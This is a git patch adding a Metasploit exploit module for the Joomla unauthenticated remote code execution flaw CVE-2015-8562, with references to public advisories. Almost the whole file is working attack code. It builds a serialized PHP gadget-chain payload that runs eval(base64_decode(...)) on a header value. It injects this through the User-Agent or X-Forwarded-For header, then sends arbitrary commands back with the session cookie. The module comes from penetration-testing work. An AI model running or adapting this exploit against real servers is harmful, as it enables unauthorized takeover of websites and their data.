From 84d5067abed9f44833696be30a3ac1c9e356e486 Mon Sep 17 00:00:00 2001
From: Christian Mehlmauer
Date: Tue, 15 Dec 2015 17:20:49 +0100
Subject: [PATCH] add joomla RCE module
---
.../multi/http/joomla_user_agent_rce.rb | 78 +++++++++++++++++++
1 file changed, 78 insertions(+)
create mode 100644 modules/exploits/multi/http/joomla_user_agent_rce.rb
diff --git a/modules/exploits/multi/http/joomla_user_agent_rce.rb b/modules/exploits/multi/http/joomla_user_agent_rce.rb
new file mode 100644
index 0000000000..6d621faf21
--- /dev/null
+++ b/modules/exploits/multi/http/joomla_user_agent_rce.rb
@@ -0,0 +1,78 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = GoodRanking
+
+ include Msf::Exploit::Remote::HttpClient
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Joomla HTTP Header Unauthenticated Remote Code Execution',
+ 'Description' => %q{
+ Joomla suffers from an unauthenticated remote code execution that affects all versions from 1.5 to 3.4.
+ By storing user supplied headers in the databases session table it's possible to truncate the input
+ by sending an UTF-8 character. The custom created payload is then executed once the session is read
+ from the databse
+ },
+ 'Author' =>
+ [
+ 'Marc-Alexandre Montpas', # discovery
+ 'Christian Mehlmauer' # metasploit module
+ ],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ ['CVE', '2015-8562'],
+ ['URL', 'https://blog.sucuri.net/2015/12/joomla-remote-code-execution-the-details.html'],
+ ['URL', 'https://blog.sucuri.net/2015/12/remote-command-execution-vulnerability-in-joomla.html'],
+ ['URL', 'https://developer.joomla.org/security-centre/630-20151214-core-remote-code-execution-vulnerability.html'],
+ ['URL', 'https://translate.google.com/translate?hl=en&sl=auto&tl=en&u=http%3A%2F%2Fdrops.wooyun.org%2Fpapers%2F11330'],
+ ['URL', 'https://translate.google.com/translate?hl=en&sl=auto&tl=en&u=http%3A%2F%2Fwww.freebuf.com%2Fvuls%2F89754.html']
+ ],
+ 'Privileged' => false,
+ 'Platform' => 'php',
+ 'Arch' => ARCH_PHP,
+ 'Targets' => [['Joomla', {}]],
+ 'DisclosureDate' => 'Dec 14 2015',
+ 'DefaultTarget' => 0)
+ )
+
+ register_options(
+ [
+ OptString.new('TARGETURI', [ true, 'The path to joomla', '/' ]),
+ OptEnum.new('HEADER', [ true, 'The header to use for exploitation', 'USER-AGENT', [ 'USER-AGENT', 'X-FORWARDED-FOR' ]])
+ ], self.class)
+ end
+
+ def get_payload
+ pre = "#{Rex::Text.rand_text_alpha(5)}}__#{Rex::Text.rand_text_alpha(10)}|"
+ middle = 'O:21:"JDatabaseDriverMysqli":3:{s:4:"\0\0\0a";O:17:"JSimplepieFactory":0:{}s:21:"\0\0\0disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:5:"cache";b:1;s:19:"cache_name_function";s:6:"assert";s:10:"javascript";i:9999;s:8:"feed_url";'
+ pay = "eval(base64_decode($_SERVER['HTTP_CMD']));JFactory::getConfig();exit;"
+ middle2 = '";}i:1;s:4:"init";}}s:13:"\0\0\0connection";i:1;}'
+ post = "\xF0\x9D\x8C\x86"
+ return "#{pre}#{middle}s:#{pay.length}:\"#{pay}#{middle2}#{post}"
+ end
+
+ def exploit
+ print_status("Sending payload ...")
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => target_uri.to_s,
+ 'headers' => { datastore['HEADER'] => get_payload }
+ })
+ session_cookie = res.get_cookies
+ res = send_request_cgi({
+ 'method' => 'GET',
+ 'uri' => target_uri.to_s,
+ 'cookie' => session_cookie,
+ 'headers' => {
+ 'CMD' => Rex::Text.encode_base64(payload.encoded)
+ }
+ })
+ end
+end